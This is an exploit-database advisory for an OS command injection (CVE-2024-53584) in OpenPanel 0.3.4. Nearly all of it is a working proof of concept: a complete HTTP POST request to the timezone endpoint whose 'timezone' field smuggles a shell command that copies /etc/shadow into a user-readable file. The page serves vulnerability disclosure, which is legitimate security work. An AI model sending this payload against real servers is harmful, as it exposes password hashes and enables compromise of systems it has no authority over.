OpenPanel 0.3.4 Command Injection

2025.01.29
Credit: Multiple
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: OpenPanel 0.3.4 - OS Command Injection via The Timezone Parameter # Date: Nov 25, 2024 # Exploit Author: Korn Chaisuwan, Punthat Siriwan, Pongtorn Angsuchotmetee # Vendor Homepage: https://openpanel.com/ # Software Link: https://openpanel.com/ # Version: 0.3.4 # Tested on: macOS # CVE : CVE-2024-53584 POST /server/timezone HTTP/2 Host: demo.openpanel.org:2083 Cookie: minimenu=0; session=eyJfZnJlc2giOmZhbHNlLCJ1c2VyX2lkIjozfQ.ZyyaKQ.HijWQTQ_I0yftDYEqqqqRR_FuRU; theme=dark User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Referer: https://demo.openpanel.org:2083/server/timezone Content-Type: application/x-www-form-urlencoded Content-Length: 51 Origin: https://demo.openpanel.org:2083 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Priority: u=0 Te: trailers timezone=;cat+/etc/shadow+>+/home/stefan/secret.txt


Vote for this issue:
50%
50%

Comment it here.

Copyright 2025, cxsecurity.com

 

Back to Top